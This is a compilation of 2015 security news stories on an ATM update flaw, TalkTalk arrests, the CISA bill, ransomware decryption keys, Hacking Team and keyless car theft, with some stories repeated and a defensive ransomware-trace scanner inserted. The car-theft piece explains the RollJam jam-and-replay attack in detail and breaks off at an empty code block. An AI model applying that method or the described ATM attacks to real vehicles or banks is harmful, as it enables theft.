The discovery of the anomaly was accidental: Benjamin Kunz-Mejri was using the ATM when it ejected his card and displayed “temporarily not available.” The expert tried to interact with the ATM and observed a Windows command prompt showing an ongoing update process; he took a video of the information displayed on the terminal.

The change of the status was caused by a software update, and the researcher used the term “timing attack” to describe his interaction with the ATM.

He was surprised that the ATM keyboard was not disabled, allowing an attacker to execute system commands via the command prompt. He also noticed that the card reader remained usable during the update process.


The video recording allowed the expert to analyze the information displayed on the screen; he noticed that a lot of sensitive data was revealed, including the bank’s main system branch usernames, serial numbers, network and firewall configurations, device IDs, ATM settings, and two system passwords.

The ATMs analyzed by the researcher are manufactured by Wincor Nixdorf, one of the most important companies in the retail and banking industry. The flawed terminals run the Windows 7 and Windows XP operating systems. It is likely that other banks using Wincor Nixdorf ATMs are affected as well.

The experts warn about a large-scale attack coordinated by a criminal ring to coincide with a planned update, and describe the following possible attack scenarios:

The attacker could use the information disclosed during the update process to run a man-in-the-middle (MitM) attack on the targeted bank’s local network. The attacker needs physical access to the bank network.
The attacker could push a bogus update to reconfigure the ATMs; in this case too, physical access to the bank network is needed.
The attacker could conduct fraudulent transactions by forcing the ATM to crash and corrupting the logging or debugging mechanism.
The Vulnerability Lab reported the security issue to Sparkasse’s Security and Data Protection team in May, the flaw was confirmed after the vulnerability report was received by the internal Finance Security Center.

The Sparkasse bank has already pushed out updates that fix the issue to a limited number of ATMs in the city of Kassel. The purpose is to run further tests before issuing the update to all the ATMs used by the organization.

It is the first time that a German bank has admitted a security vulnerability in an ATM and rewarded the researchers.

Third suspect arrested in connection with the TalkTalk breach

A third suspect has been arrested by the British authorities in connection with the TalkTalk breach, he is a 20-year-old from Staffordshire.
While the investigation of the TalkTalk data breach is going on, a third man has been arrested in connection with the hack. The third unnamed suspect is a 20-year-old man from Staffordshire, he has been released on bail until March after he was arrested by law enforcement under the country’s Computer Misuse Act.

Investigators believe that he is a member of the group that hacked the telco TalkTalk, stealing 1.2 million customer details (email addresses, names, phone numbers, dates of birth) along with nearly 28,000 partial credit and debit card numbers.

On October 26, the UK Metropolitan Police announced the arrest of a 15-year-old in connection with the data breach. Officers from the Police Service of Northern Ireland (PSNI) identified the youngster and arrested him on suspicion of Computer Misuse Act offences.


In a statement, the UK Metropolitan Police announced that officers from the Police Service of Northern Ireland, working with detectives from the MPCCU (MET Cyber Crime Unit) executed a search warrant at an address in County Antrim, Northern Ireland.

“At the address, a 15-year-old boy was arrested on suspicion of Computer Misuse Act offences. He has been taken into custody at a County Antrim police station where he will later be interviewed. A search of the address is ongoing and enquiries continue. This is a joint investigation by MPCCU detectives, the PSNI’s Cyber Crime Centre (CCC) and the National Crime Agency,” the statement added.

Some days later, on October 20, the UK Police arrested a second individual as part of the investigation into the TalkTalk security breach; in this case too, the suspect is a teenager. According to the Metropolitan Police, the second suspect is a 16-year-old boy from Feltham. The teen was arrested by officers of the Cyber Crime Unit on suspicion of Computer Misuse Act offences and was later bailed.

The Register reported that victims of the cyber attack are entitled to leave TalkTalk and terminate their contract without difficulty.

“Customers wanting to leave the popped telco will need to have had money stolen on or after 21 October as a result of the hack, and have contacted the fraud department,” states The Register. “TalkTalk says it is not accepting liability for other possible expenses customers may have to bear as a result of the breach.”

CISA Passes Senate, criticism about privacy and security


The CISA cyber security bill passes the US Senate despite tech giants, privacy advocates, and civil liberties groups expressing their disappointment.
The US Senate voted overwhelmingly to pass a version of the Cybersecurity Information Sharing Act (CISA), a bill that has been debated for a long time because it would authorize pervasive government monitoring of citizens.

Many politicians, tech giants, privacy advocates, and civil liberties groups are expressing their disappointment and consternation at the decision of the US Senate. The CISA bill passed with a final vote of 74 to 21; it requires companies to share information about potential threats with the government.


The senators who voted for the bill consider it a necessary measure against the numerous data breaches suffered by US companies, including Sony Pictures, JP Morgan Chase, Anthem and the Office of Personnel Management.

CISA is severely criticized because it would only make it easier for government agencies to collect information about users; the data would be collected by the Department of Homeland Security and shared with the FBI and NSA.

The privacy advocates and part of the security industry believe that the CISA bill doesn’t address the problems that caused the long series of data breaches.

“The bill is fundamentally flawed due to its broad immunity clauses, vague definitions, and aggressive spying authorities. The bill now moves to a conference committee despite its inability to address problems that caused recent highly publicized computer data breaches, like unencrypted files, poor computer architecture, un-updated servers, and employees (or contractors) clicking malware links,” states the EFF, voicing its disappointment as CISA passes the Senate.

The conference committee between the House of Representatives and the Senate will determine the bill’s final language, but experts are skeptical that it can be modified to properly address the real cybersecurity problems.

The Cybersecurity Information Sharing Act is considered a reincarnation, in a new guise, of CISPA, which passed the United States House of Representatives on April 18, 2013, but was blocked by the Senate.

While CISPA was hampered by the Obama administration due to privacy concerns, CISA has the support of the President.

“The passage of CISA reflects the misunderstanding many lawmakers have about technology and security,” continues the EFF. “With security breaches like T-mobile, Target, and OPM becoming the norm, Congress knows it needs to do something about cybersecurity. It chose to do the wrong thing. EFF will continue to fight against the bill by urging the conference committee to incorporate pro-privacy language.”

CISA requests sharing of “cyber threat indicators,” but doesn’t address privacy issues.

Sen. Ron Wyden (D-Ore.) is one of the opponents of the CISA bill, which he considers “flawed” and just “feel-good legislation.” He warned about the abuses that could result from the application of CISA.

“The fight to secure Americans’ private, personal data has just begun,” said Wyden. “Today’s vote is simply an early, flawed step in what is sure to be a long debate over how the U.S. can best defend itself against cyber threats.”

Prior to the final vote, the principal IT companies, including Apple, Google and Microsoft, also expressed their privacy concerns over CISA and its requirement to share sensitive customer data with US agencies.

“We don’t support the current CISA proposal. The trust of our customers means everything to us and we don’t believe security should come at the expense of their privacy.” said an Apple spokesperson before the final vote.

Report: German Bank ATMs vulnerable to Hackers

Avoiding credit card fraud is simple as long as you use cash. But what if you get hacked even while withdrawing cash from an ATM?
If you are living in Germany or traveling there, then think twice before using your payment cards in the ATMs.
Here’s why:
A security researcher in Germany has managed to hack an ATM and self-service terminal from Sparkasse Bank in a way that allowed him to reveal sensitive details from the payment card inserted into the machine.
Benjamin Kunz-Mejri, CEO of Germany-based security firm Vulnerability Lab, discovered a vulnerability while using a Sparkasse terminal that suddenly ejected his card, and changed status to "temporarily not available."
Meanwhile, the machine automatically started a software update process in the background. However, Benjamin used a special keyboard combination to trick the ATM into another mode.
Benjamin’s trick forced ATM system to put update process console (cmd) in the foreground of the warning message.
"At that moment the researcher realized that there is a gap and used his iPhone to capture the bootChkN console output (Wincor Nixdorf) of the branch administrator," a blog post on Vulnerability-Lab stated.
After saving the data and reviewing the recording, Benjamin was able to reveal a lot of sensitive information, including the bank’s main branch office:
Serial numbers
Firewall settings
Network information
Computer name
Device IDs
ATM settings
Two system passwords
Other hardware related information
The ATM (Automated Teller Machine) analyzed by Benjamin is manufactured by Wincor Nixdorf, one of the most famous companies in the retail and banking industry.
Therefore, the chances are high that other banks that are using the Wincor Nixdorf ATMs and self-service terminals are also affected, along with Sparkasse Bank.
Benjamin reported the critical issue to the Sparkasse Bank, which acknowledged the issue and has now started patching its ATMs and self-service terminals to prevent attacks.

Some ransomware victims can now unlock their data for free

2.11.2015 Viruses
Were you hit by the CoinVault or Bitcryptor ransomware? In all likelihood you can unlock your data for free, because 14 thousand keys that make this possible are now available; they were obtained by Kaspersky Lab and the authorities in the Netherlands.

Both types of this malicious malware appear to be dead. Their authors have been detained, which also led to the recovery of roughly fourteen thousand decryption keys with which victims can now unlock their data.

The CoinVault and Bitcryptor threat appeared last May, when the ransomware infected a large number of computers and locked valuable data on them. To unlock it, the creators of the malicious program demanded a ransom worth hundreds of dollars in Bitcoin.

Police detained the perpetrators a few weeks ago in Amersfoort in the Netherlands; they were two young men aged eighteen and twenty-two. Kaspersky Lab also contributed to their exposure: its staff obtained roughly fourteen thousand decryption keys, which they have now added to their noransom.kaspersky.com database for use by affected users. According to Kaspersky Lab, the CoinVault, or rather Bitcryptor, case is thus closed.

Victims of other ransomware attacks are not so lucky, however. The American FBI, which deals with this issue, has admitted that it is powerless against most such attacks. “To be honest, we often recommend that people just pay the ransom,” said agent Joseph Bonavolonta.

The number of ransomware infections has been growing dramatically in recent years. The number of users hit by the most widespread ransomware, CryptoWall version 3, is already in the hundreds of thousands, and the group responsible for it has collected more than 325 million dollars in ransom.

Symantec’s new product can detect advanced threats

2.11.2015 Security
According to the vendor, the Advanced Threat Protection (ATP) solution makes it possible to detect security threats, determine their severity and remove them across the entire infrastructure.

Symantec has announced a security solution designed specifically against advanced threats. A single console is reportedly enough to monitor threats, all important actions require only a single mouse click, and no new agents need to be installed on endpoints.

The ATP solution correlates suspicious activity from all control points and prioritizes events so that it is immediately clear which of them pose the greatest risk to the organization.

Once a critical threat is identified, all of its instances (copies on other points, various manifestations on the corporate network, etc.) can be blocked easily and quickly.

The main advanced threats today include ransomware (malware that extorts victims), Trojans that give an attacker remote access, advanced persistent threats (APT) and zero-day attacks (exploitation of software flaws before the vendor releases a fix).

ATP includes, among other things, the Cynic technology, a new sandbox technology: a cloud-based simulation environment that makes it possible to determine the severity of individual threats.

ATP also includes the Synapse functionality, a technology that works across the individual control points and analyzes suspicious activity at the endpoint, network and e-mail level, again helping to determine what currently poses the greatest risk to the organization.

The solution will be available at the end of 2015.

Hackers have accessed details of 1,827 Vodafone customers

According to Vodafone UK, criminals used the stolen data obtained from “an unknown source” to try to access customers’ accounts.
Personal details belonging to roughly 2,000 Vodafone customers have been compromised.

According to Vodafone, cyber criminals used the stolen data (emails and passwords) obtained from “an unknown source” to try to access customers’ accounts between Wednesday and Thursday.

“We can confirm that Vodafone UK was subject to an attempt to access some customers’ account details between midnight on Wednesday 28 October and midday on Thursday 29 October. At that point we initiated a comprehensive investigation to fully understand the facts so that we could give any affected customers the best possible advice. We informed the National Crime Agency (NCA), the ICO and Ofcom of the issue on the evening of Friday 30 October.” states the message issued by Vodafone UK.


According to the telecommunications company, the criminals accessed 1,827 customer accounts, obtaining names, mobile phone numbers, bank sort codes and the last four digits of bank account numbers.

No credit or debit card numbers or details were obtained, but it is important to keep in mind that data accessed by criminals could be used for fraudulent activities.

In this case too, the company says its systems were not breached, a circumstance similar to the incident that recently affected British Gas and exposed 2,200 records.

In response to the security breach, Vodafone has blocked the customers’ accounts involved in the incident and it is contacting affected customers to assist them with changing their account details.

Vodafone has already contacted the banks of affected customers to alert them to potential risks for the individual involved. Vodafone is now working with the National Crime Agency (NCA) and has already informed the ICO and Ofcom of the issue on the evening of Friday 30 October.

“The NCA can confirm that we have been contacted by Vodafone in relation to a compromise of customer data, and we are in dialogue with the company,” said an NCA spokeswoman. “Anyone who thinks they have been subject to attempted or successful fraud, or other online crime, should report it to Action Fraud at www.actionfraud.police.uk.”

“We will also be loading customers’ details into the Credit Industry Fraud Avoidance Service (CIFAS) database, which will ensure that bank or mobile operators will make additional checks to avoid fraud,” Vodafone added.

Victims of the security breach should:

Carefully monitor their bank accounts and report any unusual activity. Users in England, Wales or Northern Ireland can contact the national fraud and internet crime reporting centre Action Fraud on 0300 123 2040 or at www.actionfraud.police.uk. Scottish users can call Police Scotland.
Be aware of phishing emails.
Avoid giving out personal and financial data.

Criminals behind CryptoWall 3.0 Made $325 Million

Security researchers of the Cyber Threat Alliance have conducted an investigation into the cybercriminal operations leveraging CryptoWall 3.0 ransomware.
Brief Background

Ransomware, specifically crypto-ransomware, is a malware classification that encompasses Trojans that enumerate the file system of an infected host, in order to discover and compromise any and every document possible. Crypto-ransomware encrypts the contents of supported data files, rendering these files useless to their rightful owner.

This malware classification is quite self-explanatory; ransomware will often drop ransom notes in many areas within the affected file system, in varying formats and/or languages, that demand that the victim pays a ransom in order to recover their files. This ransom is usually paid in Bitcoin, with a (sometimes empty) promise of providing a decryption utility in order to recover all affected files, as a result of a successful, cleared ransom payment.
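The two traces described above, ransom notes dropped across the file system and data files whose contents have been replaced by ciphertext, are what a defender can look for after the fact. The following scanner is an added example, not code from the Cyber Threat Alliance report; the note filenames, the extension lists and the sample directory tree are constructed, and a real deployment would take the indicator lists from threat intelligence.

```python
"""Scan a directory tree for the traces crypto-ransomware leaves behind.

Added example; NOTE_NAMES, ENCRYPTED_SUFFIXES and the sample tree are constructed.
"""
import math
import os
import tempfile
from collections import Counter
from pathlib import Path

# Constructed indicator lists (a real deployment would load these from threat intel).
NOTE_NAMES = {"help_decrypt.txt", "help_decrypt.html", "how_to_recover_files.txt"}
ENCRYPTED_SUFFIXES = {".encrypted", ".locked", ".crypt"}
# Legitimately dense formats that would otherwise trip the entropy check.
COMPRESSED_SUFFIXES = {".zip", ".gz", ".jpg", ".png", ".mp4", ".pdf"}
ENTROPY_THRESHOLD = 7.5  # bits per byte; text sits around 4-5, ciphertext near 8


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 8.0 is the maximum, reached by uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def scan_tree(root: str, sample_bytes: int = 4096) -> dict:
    """Walk root and report ransom notes and ciphertext-like data files.

    Returns {'notes': [paths], 'encrypted': [paths], 'dirs_with_notes': count}.
    Notes spread over many directories are the strongest signal, because that is
    exactly the behaviour the report describes.
    """
    findings = {"notes": [], "encrypted": [], "dirs_with_notes": 0}
    for dirpath, _dirs, files in os.walk(root):
        note_hits = [f for f in files if f.lower() in NOTE_NAMES]
        if note_hits:
            findings["dirs_with_notes"] += 1
            findings["notes"].extend(os.path.join(dirpath, f) for f in note_hits)
        for f in files:
            path = Path(dirpath, f)
            suffix = path.suffix.lower()
            if f in note_hits or suffix in COMPRESSED_SUFFIXES:
                continue
            with open(path, "rb") as fh:
                head = fh.read(sample_bytes)
            # A renamed extension alone is weak (a user may name a file that way), and
            # high entropy alone catches archives, so require both for a positive.
            if suffix in ENCRYPTED_SUFFIXES and shannon_entropy(head) >= ENTROPY_THRESHOLD:
                findings["encrypted"].append(str(path))
    return findings


def build_sample_tree() -> str:
    """Create a constructed victim-like tree: notes in two folders, one encrypted
    document (random bytes stand in for ciphertext), one untouched document and
    one dense but benign archive. Returns the root path."""
    root = tempfile.mkdtemp(prefix="ransom_scan_")
    docs, pics = Path(root, "Documents"), Path(root, "Pictures")
    docs.mkdir()
    pics.mkdir()
    (docs / "HELP_DECRYPT.txt").write_text("Your files are encrypted. Pay in Bitcoin.")
    (pics / "HELP_DECRYPT.html").write_text("<html>pay</html>")
    (docs / "budget.xlsx.encrypted").write_bytes(os.urandom(8192))
    (docs / "notes.txt").write_text("quarterly planning notes\n" * 100)
    (pics / "holiday.zip").write_bytes(os.urandom(8192))
    return root


if __name__ == "__main__":
    result = scan_tree(build_sample_tree())
    print(f"{result['dirs_with_notes']} directories with ransom notes")
    print("encrypted files:", result["encrypted"])
```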

The CryptoWall family of ransomware first emerged in April 2014. Its first major revision came with the upgrade to CryptoWall 2.0, in October 2014. The most recent variant of the CryptoWall ransomware, CryptoWall 3.0, emerged in-the-wild beginning in January 2015.


The sophistication of CryptoWall has grown dramatically since it first appeared; CryptoWall 3.0 is the most advanced and the most prevalent ransomware actively distributed in the wild today.

Statistical Information

Through a collaborative effort between several large, well-respected information security firms, several CryptoWall 3.0 campaigns were analyzed in great detail, revealing a wealth of information about the threat actor(s) and their effectiveness. The information security firms that participated in this analysis include Intel Security, Fortinet, Symantec, Palo Alto Networks, and several other members of the Cyber Threat Alliance.

Monetary Damages: Approximately $325 Million
Analyzed Malware Samples: Over 4,000
Discovered C&C URLs: Approximately 839
Discovered 2nd-Tier C&C IP Addresses: Approximately 5
Total Infection Attempts: Over 400,000 Across 49 CryptoWall 3.0 Campaigns
Region Most Affected: North America

Across 49 analyzed CryptoWall 3.0 campaigns, over 400,000 infection attempts were logged. CryptoWall 3.0 is commonly delivered via phishing e-mail, but it is also quite commonly delivered as a payload of an exploit kit. Specifically, CryptoWall 3.0 seems to be the most commonly delivered payload by the Angler EK; the most active, sophisticated exploit kit found in-the-wild today. CryptoWall 3.0 ransom payments accounted for an estimated total of more than $60 million in revenue for an Angler EK group exposed by Cisco’s Talos Group earlier this year.


It just goes to show that the prevalence of ransomware in the wild is on the rise, and the rapid growth of ransomware in sophistication and number of variants is not slowing down. Malware authors have been leveraging exploit kits to deliver their ransomware, a very effective infection method that is only becoming harder to defend against.

Free Ransomware Decryption Tool — CoinVault and Bitcryptor

Have you been infected with the insidious CoinVault or Bitcryptor ransomware?
If so, there is some potentially good news for you.
You may now recover your encrypted files for FREE! – Thanks to the efforts of Dutch police and antivirus maker Kaspersky Lab.
Security researchers from Kaspersky Lab and the Dutch Public Prosecution Service have obtained and published the last set of encryption keys from command-and-control (C&C) servers used by two related ransomware threats – CoinVault and Bitcryptor.
Security researchers first observed CoinVault ransomware attacks in May 2014. Since then, CoinVault has claimed more than 1,500 victims in more than 108 countries.
In April 2015, the Dutch police obtained the decryption keys database from a seized command and control server of CoinVault.
Those decryption keys were then used by Kaspersky Lab to set up a Ransomware Decryptor Service, which included a set of around 750 decryption keys recovered from CoinVault servers hosted in the Netherlands.
After that raid, the CoinVault's authors slowly updated their code, eventually releasing a second-generation CoinVault version that they named Bitcryptor.
However, last month the Dutch authorities arrested two men in connection with the CoinVault and Bitcryptor ransomware attacks, leading to the recovery of an additional 14,031 decryption keys.
The keys have now been added to Kaspersky's Ransomware Decryptor Service and published on the noransom.kaspersky.com website.
Those victims that had their PCs infected by these ransomware programs and still have the encrypted data lying around can now download these keys to unlock their personal files.
How to Decrypt CoinVault and Bitcryptor Ransomware:
Step 1: Note down the Bitcoin wallet address mentioned by the malware.
Step 2: Get the encrypted file list from the ransomware interface.
Step 3: Then download an effective antivirus and remove CoinVault Ransomware.
Step 4: Open https://noransom.kaspersky.com and download the decryption tool released by Kaspersky Labs.
Step 5: Install additional libraries and Decrypt your files.
However, there's only one catch:
"If you get infected by this ransomware in the near future, you are out of luck."
Ransomware on Rise
Ransomware has emerged as one of the biggest Internet threats to the web users in recent years.
The authors of the notorious CryptoWall ransomware have raised more than $325 MILLION (£212 million) in this past year alone.
Typically, hackers gain access to a user's computer and deploy ransomware that encrypts data files with a strong cryptographic algorithm, then demand ransom money (to be paid in Bitcoin) ranging from $200 to $10,000.
How to Protect Yourself Against Ransomware Attacks?
Just a few days back, the Federal Bureau of Investigation (FBI) advised ransomware victims to just pay off the criminals in order to see their valuable data again.
However, in my opinion, the best defense against these threats is to ensure that all your important files are regularly backed up to a separate drive or storage that is only temporarily connected and cannot be reached by the attackers.
A few more things you should keep in mind to prevent your Computer from getting infected with ransomware and other malware threats are:
Ensure your system software and antivirus definitions are up-to-date.
Avoid visiting suspicious websites.
Avoid Opening Emails and attachments from unknown sources.

Hacking Team Offering Encryption Cracking Tools to Law Enforcement Agencies

Hacking Team, the infamous Italy-based spyware company that had more than 400 GB of its confidential information stolen earlier this year, has resumed its operations and started pitching new hacking tools to help US law enforcement get around their encryption issues.
Yes, Hacking Team is back with a new set of Encryption Cracking Tools for government agencies as well as other customers to break encrypted communications.
The announcement came in an email pitch sent to existing and potential new customers on October 19 when Hacking Team CEO David Vincenzetti confirmed that Hacking Team is now "finalizing [its] brand new and totally unprecedented cyber investigation solutions."
The e-mail is not made public, but Motherboard has been able to obtain a copy of it that states:
"Most [government agencies] in the United States and abroad will become 'blind,' they will 'go dark,' they will simply be unable to fight vicious phenomena such as terrorism," wrote Vincenzetti. "Only the private companies can help here; we are one of them."
"It is crystal clear that the present American administration does not have the stomach to oppose the American IT conglomerates and to approve unpopularly, yet totally necessary, regulations," he added.
Game Changers
The brand new cyber investigation solutions Vincenzetti is talking about will be "Game Changers."
The announcement came roughly 4 months after a mysterious hacker or group of hackers hacked into Hacking Team's servers, leaking more than 400 gigabytes of internal data, including:
Internal emails
Hacking tools
Zero-day exploits
Surveillance tools
Source code for Spyware suite, called Remote Control System (RCS)
A spreadsheet listing every government client with date of purchase and amount paid
Remote Control System Version 10 (RCS 10)
Since then, Hacking Team has reportedly been working on launching a new revamped 10th edition of its proprietary Remote Control System, RCS 10.
Hacking Team is known for its Remote Control System (RCS) spyware, also known as Galileo, which is loaded with a number of zero-day exploits that have the ability to monitor the computers of its targets remotely.
However, it's still unclear when the company will actually release RCS 10. It also remains to be seen which law enforcement agencies will take up the Hacking Team offer, given its recent security breach.

Anonymous will reveal names of about 1,000 KKK members

“Ku Klux Klan, We never stopped watching you,” “We know who you are.” Anonymous plans to reveal the identities of up to 1,000 Ku Klux Klan members.
The popular Anonymous collective has declared war on the white supremacist group Ku Klux Klan (KKK); the hacktivists have posted a video message on YouTube and a message on Twitter announcing that they hold a list of names of Klan members.

Anonymous confirmed that they hacked a Twitter account and obtained through it about 1,000 Klan member identities.

We’ve gained access to yet another KKK Twitter account. Using the info obtained, we will be revealing about 1000 klan member identities.
— Operation KKK (@Operation_KKK) 22 October 2015

“All will be revealed next month around the one year anniversary of #OpKKK,” it tweeted, under the handle @Operation_KKK. The Anonymous campaign dubbed #OpKKK began in November 2014 in response to the threats that KKK members made against peaceful protesters in Ferguson. Ferguson (Missouri) became the center of racial tensions after officer Darren Wilson killed the 18-year-old black teenager Michael Brown in August 2014.

“You are more than extremists. You are more than a hate group,” states the Anonymous message. “You operate much more like terrorists and you should be recognized as such. You are terrorists that hide your identities beneath sheets and infiltrate society on every level.” “The privacy of the Ku Klux Klan no longer exists in cyberspace. You’ve had blood on your hands for nearly 200 years.” Anonymous also announced the imminent disclosure of the identities of 1,000 members of the KKK.

“We will release, to the global public, the identities of up to 1,000 Klan members, Ghoul Squad affiliates and other close associates of various factions of the Ku Klux Klan across the United States.”
The Ghoul Squad is considered an organization belonging to the KKK.

Stay Tuned …. this is just the beginning.

How CoinVault or Bitcryptor victims could try to recover their files

Victims of CoinVault ransomware can now rely on a new set of encryption keys added to the free CoinVault Ransomware Decryptor tool to recover their files.
Every day, dozens of users ask me how to decrypt their data locked by ransomware such as CoinVault or Bitcryptor.

Now I have good news for them: it is possible to use a free tool to recover the encrypted files.

The tool was designed by the experts of the Kaspersky Lab in collaboration with the Dutch police, the experts have used a set of encryption keys extracted from command-and-control (C&C) servers used by two groups that were using CoinVault and Bitcryptor.

In May 2014, investigators detected numerous attacks based on the CoinVault ransomware, which infected more than 1,500 victims in 108 countries.

In April 2015, the Dutch Public Prosecution Service extracted a set of CoinVault Decryption keys from a database present on a seized command and control server.

In April 2015, Kaspersky Lab announced the development of the tool, called “CoinVault Ransomware Decryptor”, built together with the National High Tech Crime Unit (NHTCU) of the Dutch Police.
CoinVault malware

The tool included a set of around 750 decryption keys recovered from CoinVault servers hosted in the Netherlands.

In response to the action of the law enforcement, the authors of CoinVault updated their code and released a new version dubbed Bitcryptor.

Law enforcement can now rely on an additional 14,031 decryption keys, obtained last month by the Dutch authorities following the arrest of two men in connection with the CoinVault and Bitcryptor ransomware attacks.

The keys have been added to Kaspersky’s Ransomware Decryptor service, which is available on the noransom.kaspersky.com website.
If you are a victim of a CoinVault or Bitcryptor attack, you can try these keys to unlock your encrypted files. The tool matches the Bitcoin wallet address displayed by the malware against the recovered key database, so that address is the one piece of information you must keep.
To decrypt the files, use the following procedure:
Step 1: If you are infected with CoinVault, write down the Bitcoin wallet address shown by the malware on the screen.
Step 2: Export the list of encrypted files from the ransomware interface.
Step 3: Install a reputable antivirus product and remove the CoinVault ransomware first, so it cannot re-encrypt the recovered files.
Step 4: Open https://noransom.kaspersky.com and download the decryption tool released by Kaspersky Lab.
Step 5: Install the additional libraries the tool requires and decrypt your files.
In order to protect your computer from malware:

Ensure your system software and antivirus definitions are up to date.
Avoid visiting suspicious websites.
Regularly back up your important files to a separate drive or storage that is connected only while the backup runs; a backup that stays mounted is encrypted along with everything else.
Be on high alert for pop-ups, spam, and unexpected email attachments.

Hacking discipline, EOL of computer science in the cyber domain

The hacking world will change. Instead of being based on computer programming as it is today, hacking will be based on chemistry, biology, and physics.
In the medium-term future, the hacking world will change. Instead of being based on computer programming as it is today, hacking will be based on chemistry, biology and physics. This article explains this claim. For the discussion, I will split the hacking scene into two main scenarios: hacking autonomous machines and hacking the human body.

By “autonomous machines” I mean self-healing machines that can find and fix vulnerabilities in their own code. When such machines are developed, they will make human hackers useless. In that future, only machines will hack each other. I will come back to this future later.


In the other scenario, humans control the machines, and hackers manipulate those humans in order to hack the machines. Looked at more closely, humans build the machines, program them, use them and fix them; the entire life cycle of a machine is controlled by humans. Therefore, by hacking human behavior, one can control the machine.

To make it clearer: when one hacks a machine, one exploits either the code that another human wrote for the machine or the behavior of the human who uses it. Zero-day vulnerabilities, backdoors and logic bombs are all human failures. Once autonomous machines are developed, all those failures will be reduced to a minimum or, over time, disappear.

In this “minimized failures” reality it becomes much harder for hackers to attack the machines, forcing them to go mostly after humans. One can think of the machine infrastructure as the transport and storage layer of human knowledge. If that layer becomes unhackable, what remains is hacking the human brain or body to obtain the knowledge or the behavior one wants.

Going back to the second scenario, hacking will shift to biological computing systems (the human body) rather than the machine-based systems of today. That will change the hacking profession: computer science will be replaced by chemistry, biology and physics.

While this may sound like science fiction to some, I believe it is the future. Any country that wants to maintain a competitive advantage in the future cyber domain should educate the young generation in those disciplines. It should be noted that educating someone in chemistry, biology or physics (MA/PhD) takes longer than educating them in computer science or programming.

This conclusion also applies to the business world. The change will not be linear: when autonomous machines enter the market, all existing cyber solutions will be obsolete. No human will be able to write code that protects against a cyber attack carried out by an autonomous machine. The companies that survive will be those that developed offense and defense solutions for the human body.

To summarize, the cyber domain is a dynamic technology field that is based today on machines, and because of that the machines are becoming ever more efficient on their way to autonomy.

It is not a question of “if” but of “when.” Those who understand this and embrace it will lead the future cyber domain; those who keep “holding the bull’s horn” will become irrelevant.

About the Author Ami Rojkes Dombe

Ami is an Israel-based writer and tech correspondent for Israel Defense magazine. He covers the Israeli cyber industry, the defense industries and the ICT scene. His passions include futuristic technologies, science and the geopolitical aspects of technology. He holds an MA in political science with a thesis on cyber deterrence.

The surveillance firm Hacking Team is back stronger than before

Motherboard has obtained a non-public email sent by the Hacking Team CEO to its customers that announces a new generation of hacking tools.
Hacking Team is the well-known surveillance company that suffered a serious data breach this year. More than 400 GB of sensitive data were exfiltrated from the Italian company, including internal emails, zero-day exploits, surveillance tools, the source code of the Remote Control System (RCS) spyware and a spreadsheet listing government clients.

The company has resumed its operations and, as experts expected, is working on a new set of tools for its arsenal.

Among the numerous clients of the Hacking Team, there are several US law enforcement and intelligence agencies.


Hacking Team RCS alleged clients
The news of the day is that the company is offering its clients encryption-cracking tools intended to circumvent Internet encryption.

According to the email, these tools would allow the company’s customers to break encrypted communications; no technical detail of how they work has been made public.

The news was reported by Motherboard, which obtained a copy of a non-public email sent by CEO David Vincenzetti on October 19 to a mailing list of potential and current customers.
“Most [law enforcement agencies] in the US and abroad will become ‘blind,’ they will ‘go dark:’ they will be simply be [sic] unable to fight vicious phenomena such as terrorism,” states the email sent by Hacking Team’s CEO David Vincenzetti. “Only the private companies can help here, we are one of them.” “It is crystal clear that the present American administration does not have the stomach to oppose the American IT conglomerates and to approve unpopularly, yet totally necessary, regulations.”
Following the data breach, the Hacking Team went into “full on emergency mode,” asking its customers to shut off their surveillance systems.
In response to the hack, the firm has been working on a new version of its surveillance software and hacking tools, including a new release of its RCS platform, RCS 10.
In the email, Vincenzetti announced a totally new cyber arsenal, describing the new tools as game changers:

[Hacking Team is] “finalizing brand new and totally unprecedented cyber investigation solutions, game changers, to say the least.”
Motherboard mentions a totally new RCS version, RCS 10, a powerful tool that is able to load a number of zero-day exploits designed by the company’s experts.

How to steal Jaguar XFR cars in 60 seconds by hacking them

Thieves are able to steal Jaguar XFR cars by using a hacking device that sends out a fake signal emulating the wireless key.
According to CCTV footage, a Jaguar XFR parked in a parking lot in Auckland (New Zealand) was stolen with this technique. The video shows the thief walking towards the car, opening the door and jumping in.

According to law enforcement, hacking devices like the one used in the theft are offered for sale on the Internet and can easily be configured to target specific car models that use wireless entry systems.

In 2014, nearly 6,000 cars were stolen in London with this technique.

“This guy is a professional, it’s sophisticated. It’s something that has been organised. It’s not your everyday car theft,” said Mr Beacham, the manager of the dealership. “We never heard anything and only realised an hour later … that the car was missing. The CCTV shows him speeding off down Great South Rd in broad daylight.”

Unfortunately, this kind of hack seems to be very common: thieves are using devices designed to defeat the authentication process implemented by wireless car keys.

These devices act as a jammer and, at the same time, capture the legitimate signals sent by the owner of the vehicle when he tries to unlock the car.

To better understand how these devices work, let me introduce RollJam, a cheap device designed by the well-known hacker Samy Kamkar and composed of a microcontroller and a battery. RollJam is capable of unlocking a wide range of cars and garage doors, is easy to use and costs under $30.

RollJam exploits security vulnerabilities in the wireless unlocking technology that is currently implemented by the majority of car manufacturers.
Keyless car thefts are rising

Keyless entry systems allow car owners to unlock the vehicle remotely from a range of about 20 meters.
RollJam was designed to steal the secret codes, known as rolling codes, that keyless entry systems generate when the car owner presses the lock or unlock button on the wireless key. A rolling code is a one-time code, derived from a secret and a counter shared between the fob and the car (not a random number), that is sent over radio to the car each time the owner presses the key fob button.

Once a rolling code has been used, the car rejects it and expects the next code in the sequence; this is what defeats a straight replay of a recorded unlock signal.

How does RollJam work?

The principle is simple: when the car owner presses the key fob to unlock the car, RollJam jams the signal on the fob’s radio frequency so the car never hears it, while recording the transmitted code.

Since the car never receives the code, the owner will likely press the button again. On the second press, RollJam again jams the signal and records this second code, and at the same time replays the first code it intercepted. That first code has never reached the car, so it is still valid, and the car unlocks.

The owner drives away believing the second press worked, while the attacker still holds an unused code. Later, when the victim has parked and left the vehicle, that stored signal unlocks the car. “Because I jammed two signals,” Kamkar said, “I still have one that I can use in the future.”
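The jam-and-replay sequence described above, as an added simulation that is not Kamkar’s RollJam code. The rolling code is modelled as an HMAC over a counter shared by fob and car, a stand-in for a KeeLoq-style hop code; the 16-code acceptance window, the shared secret and the class names are assumptions, and the radio-level jamming is abstracted into a method that records a code the car never receives. The baseline at the start shows why a plain replay fails and why the jamming step is what makes the attack work.

```python
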